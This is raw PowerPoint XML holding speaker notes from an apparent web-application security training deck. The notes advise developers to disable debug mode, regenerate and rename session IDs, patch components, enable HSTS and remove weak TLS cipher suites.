            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Port mappers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Password crackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Software version “fingerprinting”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(We’ll look at some of these tools in a few minutes…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>“Hacker How-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>To’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>” are also available on the web.  These explain how to perform preliminary recon and use the information discovered to mount attacks against web sites (some using the tools mentioned above).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Additionally, there are lists of known exploits for various versions of web browsers, databases, operating systems, etc. (see for example: http://www.exploit-db.com/) . Using a “fingerprint” program, attackers can determine the versions of the software running at a particular site (web server, OS, database, etc.) and look for known exploits that are “known to work” against that specific software.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If a known exploit exists for any of your software, defeating your system is fairly easy – all the attacker needs to do is determine your software levels (fingerprint your system), and then “look up”  the exploits that are already known to “work” on you versions. Makes the attacker’s life a little easier…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So how do these attackers gain access to all of this valuable/sensitive/secret information?</a:t>
            </a:r>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3012600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Debugging mode is helpful whenever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> an error occurs. So is very useful for application developers to debug the web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>But it will also help an attacker to “home in” on the way(s) to get past your security. Helpful insight into a mal-formed SQL injection attack, for example?  Some databases dump a TON of “attacker useful” data on screen when in debug mode… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So do other web components.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>All of the debugging commands that were available to you while you wrote the program are ALSO available to the attacker if you have DEBUG activated. The attacker may be able to play with script variables, investigate script logic, try things out and note results, etc., all of which makes the attacker’s job easier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Make SURE that all DEBUGGING is “OFF” in your production environment. Not only will this remove the unintended “assist” to attackers, it will also run your application more efficiently (no debugging overhead)!  Safer + faster = double win!!</a:t>
            </a:r>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20494792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Whenever a user changes authorization levels,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you should DROP (annihilate completely – expire it, remove from any database, etc.) the “old” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and establish a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. This can help mitigate “session fixation” attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Identifiable session IDs can “leak” information – for example, if your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionIDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are  PHPSESSID, I know that you are using PHP, if JSESSIONID, you’re using Java, if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ASP.NET_SessionId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>kinda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> self explanatory…).  USE SOMETHING DIFFERENT, and change your framework’s default to something more generic like “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>” or “id” (or “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>fred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>”, or anything else…) instead of the “default” session identifier. This will help defeat some scripted fixation/hijack attempts (although it won’t fool a person)</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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23246541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Authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> users should ALWAYS log off (or be “logged off” automatically by your code whenever they close their browser, or move on to other applications, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And your log off processing needs to annihilate the users session ID and any other sensitive data of a transient nature… IF the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> has been hijacked,  this step should make the stolen session useless to the attacker.</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42891625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HSTS (implemented by adding an http header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) can help protect your site against MITM attacks, eavesdroppers, and active network attacks. Some malware proxies implement MITM attacks and turn off encryption between the browser and the proxy (while maintaining HTTPS between the proxy and the web site – called “SSL stripping”). (first mentioned in Safety Rule #7)</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13601207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developers don’t get to put their hands on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the web server software or the OS, etc.  This is usually not within their purview.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>BUT – they can notice when something’s out-of-whack, and bring attention to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If you are a developer without system authority </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>   If something is out-of-whack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>      TELL SOMEBODY and ask for it to be corrected (or correct it yourself, if you can…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If you are an infrastructure person with authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>   If you are notified (or notice yourself) that something is out-of-whack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>      FIX IT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Of course, follow the “correct” procedures prescribed by your organization to implement the “fix”…</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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36768511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You’ve seen the news items about “giant security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hole found in product X” (X = IE, JAVA, JavaScript, .NET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Chrome, OpenSSL, Windows, IIS, Flash,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Adobe Reader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– substitute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> almost any software here…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So have the attackers.  So if you DON’T put patches on soon after they become available, you’re asking for trouble (these types of “news items” are added to the “known exploits” list, and when an attacker discovers that you’re using a “vintage” version of some software, they will search the list of known exploits to find all known exploits THAT ARE KNOWN TO WORK on your version of the software… (e.g., exploit-db.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>HP study showed that 44% of the breaches occurring during 2014 leveraged vulnerabilities that were 2 to 4 years old (https://www.securityweek.com/hp-cyber-security-report-reveals-old-vulnerabilities-still-popular-targets)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>SO STAY UP-TO-DATE (or ask your infrastructure folks to update, if you can’t update). Apply all patches (AT LEAST all of the security related ones) to ALL software, including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>OS and Hypervisor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Application server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Database server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>CMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Utilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>A/V or Endpoint security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note:  the “++” is appended to the A9 above  because this item specifically addresses “out of date” components.  BUT by using unpatched components, you are exposing yourself to almost all of the other attacks, as many of the known exploits for older software provide a platform for implementing most of the other exploits… For example, the BEAST attack against pre-TLS1.2 encryption relied upon a Java same origin policy bypass flaw (that has since been patched by Oracle) to “break” encryption.  If you’re on an older version of JAVA, and are using pre-TLS1.2 encryption, you are vulnerable to BEAST.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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38092374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major browsers now support TLS 1.2. (If you want to check which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browsers, look here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://en.wikipedia.org/wiki/Transport_Layer_Security#Web_browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows XP (no longer supported by Microsoft) and Server 2008 support TLS1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows Server 2008 R2 supports TLS 1.1 and 1.2 (plus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 1.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>See: http://support.microsoft.com/kb/245030</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ervers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will “down-shift” during the negotiation phase of session establishment, so it is safe to set your server up for TLS 1.2 (if it supports it) regardless of the browsers you wish to support.  See: https://www.ssllabs.com/projects/best-practices/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Be sure to REMOVE any insecure cipher suites from your server’s negotiation list, and order the list from most secure to least secure (REMOVE the really bad ones “at the bottom” of the list completely so that they CAN’T be used – else an attacker can force you to “downshift” to crummy security…).  For example, all RC4 and export grade suites should be removed from the list.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For ultimate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> security, require users to upgrade to a browser that supports TLS 1.2 (most already do…).  But in the “real world”, you may have to compromise – try not to “downshift” to browsers that only support SSL v3…   (Requiring a user to upgrade their browser won’t cost them anything – Firefox, Chrome, Opera, Safari, etc., are all free and work on most versions of Windows, Linux, etc…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tests: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser check -  https://www.howsmyssl.com/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web server check - https://sslcheck.casecurity.org/en_US </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TLS 1.0 adds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> stronger encryption methods, and is more secure than SSL v3. And TLS 1.2 adds even more (and stronger) encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prefer AES-GCM 128 | 256 if server supports TLS 1.2 (if not, UPGRADE!! - immune to cipher block chaining – BEAST – attacks), and use ECDHE-ECDSA .  Put these at the TOP of your cipher list… (EC is “elliptic curve”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which provides better security than other methods using the same length encryption key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If using ECDSA, make sure that you have imported the ECDSA root certificates on your machines,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> else you may notice decreased performance. See: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>http://www.nsa.gov/ia/programs/suiteb_cryptography/index.shtml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>http://code.google.com/p/sslyze/wiki/WeakCipherSuites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use strong hashes – SHA 256 or better – SHA 1 has been proven less insecure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server will “down shift” to browser level, which is why you want to drop SSL v3 completely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (else somebody with an older browser may force your server to “downshift” to an insecure mode)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. During session initiation,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the server and the client negotiate which cipher suite to use, starting with the “top” one in your list and working “down” the list until both sides agree.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you see any insecure encryption options in your server’s cipher suite list – REMOVE THEM – and, to be safe, cycle your server (not all web servers will “pick up” the change “on the fly”.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2C20B865-30AA-490B-91EC-B55FD200A00E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27282844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DISABLE –ALL– INSECURE CIPHER SUITES </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If your web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> server supports “insecure” encryption, a connection may be made using sub-standard encryption – putting your – and/or your customer’s - data at risk. Any  NULL method - like the NULL SHA and NULL MD5 shown above- provide NO encryption at all (If they’re on your server’s list, REMOVE THEM). And the suites providing less than 128 bit encryption are extremely poor, and considered “obsolete”. (http://en.wikipedia.org/wiki/40-bit_encryption ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Don’t allow this situation – remove the “crummy” suites from your server list, and they will not be “on the table” during session negotiation (so will not used).. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>See: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>http://csrc.nist.gov/groups/STM/cmvp/standards.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://code.google.com/p/sslyze/wiki/WeakCipherSuites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.owasp.org/index.php/Testing_for_Weak_SSL/TSL_Ciphers,_Insufficient_Transport_Layer_Protection_%28OWASP-EN-002%29</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And tests (from previous foil)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser check -  https://www.howsmyssl.com/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
